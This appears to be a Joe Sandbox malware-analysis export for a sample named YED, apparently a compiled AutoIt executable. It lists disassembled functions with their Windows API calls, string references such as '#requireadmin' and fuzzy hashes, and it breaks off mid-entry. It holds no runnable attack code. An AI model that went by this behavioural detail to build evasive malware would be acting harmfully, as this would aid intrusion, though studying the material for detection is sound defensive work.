Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: Menu$Delete$InfoItem
String ID: 0
API String ID: 135850232-4108050209
Opcode ID: 1d9d6a3f1c86db17cfa1f6a754e7b4b3361b0206c2b53b7739883f5af07ec429
Instruction ID: f0f1941c176447693314a9e84ad6814b584fd381efeae8eb885880c02f288316
Opcode Fuzzy Hash: 1d9d6a3f1c86db17cfa1f6a754e7b4b3361b0206c2b53b7739883f5af07ec429
Instruction Fuzzy Hash: 7541C3712143029FD720DF34D885B5ABBE4AF85320F20C6ADF9A9972D1D770E954CB62

Uniqueness

Uniqueness Score: -1.00%

Function 002A4416 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 106COMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013), ref: 002A44AA
GetWindowLongW.USER32 ref: 002A44C7
SetWindowLongW.USER32 ref: 002A44D7

Strings

SysTreeView32, xrefs: 002A447C

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: Window$Long
String ID: SysTreeView32
API String ID: 847901565-1698111956
Opcode ID: 65bb59341124ee77542515c5c7c9c4c86c5b9909c99a45179f9b8ec0b1eea7fb
Instruction ID: 5ee0cfac16f5b5d69f87e4cad696e45c333f85de07451b58192a62ec1f02feda
Opcode Fuzzy Hash: 65bb59341124ee77542515c5c7c9c4c86c5b9909c99a45179f9b8ec0b1eea7fb
Instruction Fuzzy Hash: E631A231220606AFDF209F78DC45BDA77A9EB9A334F204725F975921D0DBB0EC609B50

Uniqueness

Uniqueness Score: -1.00%

Function 00276E71 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 92memoryCOMMON

Download Yara Rule

APIs

SysReAllocString.OLEAUT32(?,?), ref: 00276EED
VariantCopyInd.OLEAUT32(?,?), ref: 00276F08
VariantClear.OLEAUT32(?), ref: 00276F12

Strings

*j', xrefs: 00276E8B, 00276E90, 00276EF8

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: Variant$AllocClearCopyString
String ID: *j'
API String ID: 2173805711-4035128418
Opcode ID: 72f3d48d040188f5f133464c7dc1408d8526a9f3cf6101bec31e2bad73743006
Instruction ID: 37e3092a84006c882177a10024da6b6d5bf693d959bb303fdc742eb6fd7fe349
Opcode Fuzzy Hash: 72f3d48d040188f5f133464c7dc1408d8526a9f3cf6101bec31e2bad73743006
Instruction Fuzzy Hash: B931F331624606DFCB05AFA4E85A8BD37B6EF85300B2044A8F8074B6A1CB709D71CFD1

Uniqueness

Uniqueness Score: -1.00%

Function 0029304E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90networkCOMMON

Download Yara Rule

APIs

Part of subcall function 0029335B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00293077,?,?), ref: 00293378

inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 0029307A
_wcslen.LIBCMT ref: 0029309B
htons.WSOCK32(00000000,?,?,00000000), ref: 00293106

Strings

255.255.255.255, xrefs: 00293095, 0029309A

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: ByteCharMultiWide_wcslenhtonsinet_addr
String ID: 255.255.255.255
API String ID: 946324512-2422070025
Opcode ID: aac933c6fa4ae11fd876e1777863d38e0ac0ca3375c11841724349b0fe383da3
Instruction ID: bbe233f8258a73efbfbf7684232196f9288b4e1513d819771c7ef333820608eb
Opcode Fuzzy Hash: aac933c6fa4ae11fd876e1777863d38e0ac0ca3375c11841724349b0fe383da3
Instruction Fuzzy Hash: CD31E7352102029FCF20CF68C485EAA77F0EF15314F248059E9158B3A2DB72EE55CB60

Uniqueness

Uniqueness Score: -1.00%

Function 002A4653 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000469,?,00000000), ref: 002A4705
SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 002A4713
DestroyWindow.USER32 ref: 002A471A

Strings

msctls_updown32, xrefs: 002A4684

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: MessageSend$DestroyWindow
String ID: msctls_updown32
API String ID: 4014797782-2298589950
Opcode ID: 03b203d8f0564ee155109a4fcb61a7e187fb0f3712dffaa16eb1f3dbfbbad178
Instruction ID: 0ceeeef8baf054e57380654d18a48c668f09c14d4417e8c9de8ec48d8a2f1755
Opcode Fuzzy Hash: 03b203d8f0564ee155109a4fcb61a7e187fb0f3712dffaa16eb1f3dbfbbad178
Instruction Fuzzy Hash: 6F2192B5610245AFDB10EF68ECC5DBB77ADEB9B794B140059F9009B261DB70EC21CA60

Uniqueness

Uniqueness Score: -1.00%

Function 002795AD Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 85COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0027961D

Strings

#OnAutoItStartRegister, xrefs: 002795F3
#notrayicon, xrefs: 002795B7
#requireadmin, xrefs: 002795D9

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: _wcslen
String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
API String ID: 176396367-2734436370
Opcode ID: 47f9ae7d287150d761063ee206a8a03a7ede1b0f9e360cc5ca9de115cb069995
Instruction ID: 82c868c62029cbee1c9a2d2cd6be53c813667eef8ab1190bb95d84fcef38075c
Opcode Fuzzy Hash: 47f9ae7d287150d761063ee206a8a03a7ede1b0f9e360cc5ca9de115cb069995
Instruction Fuzzy Hash: 07216B7213432266C331AE259C02FB773EC9FA6300F408025FA4D97041EBB49DF1C691

Uniqueness

Uniqueness Score: -1.00%

Function 002A37B7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000180,00000000,?), ref: 002A3840
SendMessageW.USER32(?,00000186,00000000,00000000), ref: 002A3850
MoveWindow.USER32(00000000,?,?,?,?,00000000), ref: 002A3876

Strings

Listbox, xrefs: 002A380F

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: MessageSend$MoveWindow
String ID: Listbox
API String ID: 3315199576-2633736733
Opcode ID: 6b4bbbffdb3558a4dc3a686307bc3be616d8210dc4e40cfe1f55a1b04e739389
Instruction ID: 7659a4dbb32b46b07bdbc3045b6cf126f9b3c8094844d6ef462c457bfef0a46b
Opcode Fuzzy Hash: 6b4bbbffdb3558a4dc3a686307bc3be616d8210dc4e40cfe1f55a1b04e739389
Instruction Fuzzy Hash: 61218072620119BFEB11CF54DC85EAB776EEF8A750F108125F9049B190CA75DC618BA0

Uniqueness

Uniqueness Score: -1.00%

Function 002849F4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00284A08
GetVolumeInformationW.KERNEL32 ref: 00284A5C
SetErrorMode.KERNEL32(00000000,?,?,002ACC08), ref: 00284AD0

Strings

%lu, xrefs: 00284A6F

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: ErrorMode$InformationVolume
String ID: %lu
API String ID: 2507767853-685833217
Opcode ID: 7b5b28dda45e5e8bfde57f514ed7a6be98da5128e16f9d04f2be359cfceacea1
Instruction ID: 3ad54d0266552ab6d40ff9743c18ed6a2657171ccef52bfc2a485474aa92eee0
Opcode Fuzzy Hash: 7b5b28dda45e5e8bfde57f514ed7a6be98da5128e16f9d04f2be359cfceacea1
Instruction Fuzzy Hash: 9C318074A10109AFD710EF54C895EAA7BF8EF09308F1480A5E809DB252DB71EE55CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 002A41EB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 002A424F
SendMessageW.USER32(?,00000406,00000000,00640000), ref: 002A4264
SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 002A4271

Strings

msctls_trackbar32, xrefs: 002A4226

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: MessageSend
String ID: msctls_trackbar32
API String ID: 3850602802-1010561917
Opcode ID: fd0740b7aedba998bff9345bbcf08f3f51f6433afae27f8c5a4d59826e41f895
Instruction ID: 46bc051ea13b107bb519a64701928c71ac00a5db1ad775c7e6827240279035a8
Opcode Fuzzy Hash: fd0740b7aedba998bff9345bbcf08f3f51f6433afae27f8c5a4d59826e41f895
Instruction Fuzzy Hash: FF110631250248BFEF20AF28CC46FAB3BACEFD6B54F110125FA55E6090DAB1DC619B50

Uniqueness

Uniqueness Score: -1.00%

Function 00272F52 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00216B57: _wcslen.LIBCMT ref: 00216B6A

Part of subcall function 00272DA7: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00272DC5
Part of subcall function 00272DA7: GetWindowThreadProcessId.USER32(?,00000000), ref: 00272DD6
Part of subcall function 00272DA7: GetCurrentThreadId.KERNEL32(00000000,?,00000000,00000000), ref: 00272DDD
Part of subcall function 00272DA7: AttachThreadInput.USER32(00000000,?,00000000), ref: 00272DE4

GetFocus.USER32 ref: 00272F78

Part of subcall function 00272DEE: GetParent.USER32(00000000), ref: 00272DF9

GetClassNameW.USER32(?,?,00000100), ref: 00272FC3
EnumChildWindows.USER32 ref: 00272FEB

Strings

%s%d, xrefs: 00272FFF

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
String ID: %s%d
API String ID: 1272988791-1110647743
Opcode ID: 1a22cf7d803faf30868a17284e6822ceb7fdbd4a0a24add7af91981be54b900f
Instruction ID: b63fefb4eaee37e224ae9eead9b836a1e91e6d5c1110a83808c52fb11e3246e9
Opcode Fuzzy Hash: 1a22cf7d803faf30868a17284e6822ceb7fdbd4a0a24add7af91981be54b900f
Instruction Fuzzy Hash: F211E771610205ABCF10BF709C89EFE37AAAF95314F048075F90D9B152DE705A699F60

Uniqueness

Uniqueness Score: -1.00%

Function 002A5882 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32 ref: 002A58C1
SetMenuItemInfoW.USER32 ref: 002A58EE
DrawMenuBar.USER32 ref: 002A58FD

Strings

0, xrefs: 002A588F

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: Menu$InfoItem$Draw
String ID: 0
API String ID: 3227129158-4108050209
Opcode ID: 5dec18b362082ab0bcc1a3e704417a2f230b618e346db33334f096db7e74d003
Instruction ID: 98d950dad6f5c16763e7a7cc62d211411870e4d12efa80967deec69067921d8d
Opcode Fuzzy Hash: 5dec18b362082ab0bcc1a3e704417a2f230b618e346db33334f096db7e74d003
Instruction Fuzzy Hash: 3A013C31520229EFDB519F51E844BABBBB4BF46360F1080A9F849DA151DF708AA49F61

Uniqueness

Uniqueness Score: -1.00%

Function 0027007F Relevance: 6.3, APIs: 4, Instructions: 322COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9e9ebdfad0e3bbe74691f994936d83b63adcccdb3366aa3cb83b1c8d91c1cbe7
Instruction ID: c346d9361c44aae7431958091c8e9b8ebbf2375764a6b81daef0bca946450632
Opcode Fuzzy Hash: 9e9ebdfad0e3bbe74691f994936d83b63adcccdb3366aa3cb83b1c8d91c1cbe7
Instruction Fuzzy Hash: 8EC15B75A10206EFDB14CFA4C898AAEB7B5FF48304F208598E909EB251D771ED95CB90

Uniqueness

Uniqueness Score: -1.00%

Function 02A08145 Relevance: 6.3, APIs: 4, Instructions: 300COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000003.756895707.00000000029D0000.00000004.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000003.00000003.756895707.0000000002A91000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000003.756895707.0000000002A9E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000003.756895707.0000000002AB0000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_3_29d0000_YED.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1a429c879d0e0c11a062f5037e8e0557d84ca674edd92bd5450c4b7a15ab3dcd
Instruction ID: 17fa451d17c2124f59361b8464cb366ce4cc7d795cc42b99f6805965de797442
Opcode Fuzzy Hash: 1a429c879d0e0c11a062f5037e8e0557d84ca674edd92bd5450c4b7a15ab3dcd
Instruction Fuzzy Hash: 8CC1E574D04249AFCB21DFA8E8C0BADBBB1BF49310F044199E954A73D2CB799941CF69

Uniqueness

Uniqueness Score: -1.00%

Function 0029342E Relevance: 6.3, APIs: 4, Instructions: 257COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00293459
CoUninitialize.OLE32 ref: 00293463
VariantInit.OLEAUT32(?), ref: 0029346E
VariantClear.OLEAUT32(?), ref: 0029371B

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: Variant$ClearInitInitializeUninitialize
String ID:
API String ID: 1998397398-0
Opcode ID: f2a9287da4df259d686cec468d1d6c3f2a9748d49ae2b9c754957fe539e725ec
Instruction ID: 4b89d2bc45158e5b1c454cd391ae42b631f63c2ae6242540a7638727a5742c5a
Opcode Fuzzy Hash: f2a9287da4df259d686cec468d1d6c3f2a9748d49ae2b9c754957fe539e725ec
Instruction Fuzzy Hash: 93A15B75224201AFCB10DF64C485A6AB7E5FF8C714F048859F98A9B362DB30EE51CF91

Uniqueness

Uniqueness Score: -1.00%

Function 00270436 Relevance: 6.2, APIs: 4, Instructions: 230COMMON

Download Yara Rule

APIs

ProgIDFromCLSID.OLE32(?,00000000), ref: 002705F0
CoTaskMemFree.OLE32(00000000), ref: 00270608
CLSIDFromProgID.OLE32(?,?), ref: 0027062D
_memcmp.LIBVCRUNTIME ref: 0027064E

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: FromProg$FreeTask_memcmp
String ID:
API String ID: 314563124-0
Opcode ID: 8ef583254b3d1ba2e71ddb292fdf0ebca2df4c3c6249909920649825b04223a1
Instruction ID: 85ee559146a33c0bcb4a27e1930bc4e3f33e3ef1c18f1f4daa2fea1ba251991d
Opcode Fuzzy Hash: 8ef583254b3d1ba2e71ddb292fdf0ebca2df4c3c6249909920649825b04223a1
Instruction Fuzzy Hash: B9814C71A10109EFCB04DF94C984EEEB7B9FF89315F208158E516AB250DB71AE1ACF60

Uniqueness

Uniqueness Score: -1.00%

Function 00251391 Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 002514C0

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: dc4aa574e2cd403070821e53a0edfbde332d8a57976dc46767c23fa1f2c154d7
Instruction ID: 336dc055647334309ed15eeaf3a5e3eb7587a142aaa9ef5400b019168f859928
Opcode Fuzzy Hash: dc4aa574e2cd403070821e53a0edfbde332d8a57976dc46767c23fa1f2c154d7
Instruction Fuzzy Hash: 6E418D72A30101ABDB257FFDDC46BBF3AA4EF41371F240226FC18C6192E67488795A65

Uniqueness

Uniqueness Score: -1.00%

Function 002A6278 Relevance: 6.1, APIs: 4, Instructions: 138COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(008F51E0,?), ref: 002A62E2
ScreenToClient.USER32(?,?), ref: 002A6315
MoveWindow.USER32(?,?,?,?,000000FF,00000001), ref: 002A6382

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: Window$ClientMoveRectScreen
String ID:
API String ID: 3880355969-0
Opcode ID: d635fea5b6cd1179e7a3117fd176e745021aeec6afef3d1d7afc935a4f9c84f9
Instruction ID: 0ad22df74b0617d6b742db82b5d8cbcbcdd5cd38ea3b809be470e6ecc980543c
Opcode Fuzzy Hash: d635fea5b6cd1179e7a3117fd176e745021aeec6afef3d1d7afc935a4f9c84f9
Instruction Fuzzy Hash: 2F514D7091024AEFCF14DF54D888AAE7BB5EF56760F1481A9F8159B290DB30EDA1CB50

Uniqueness

Uniqueness Score: -1.00%

Function 0024B41F Relevance: 6.1, APIs: 4, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID:
String ID:
API String ID:
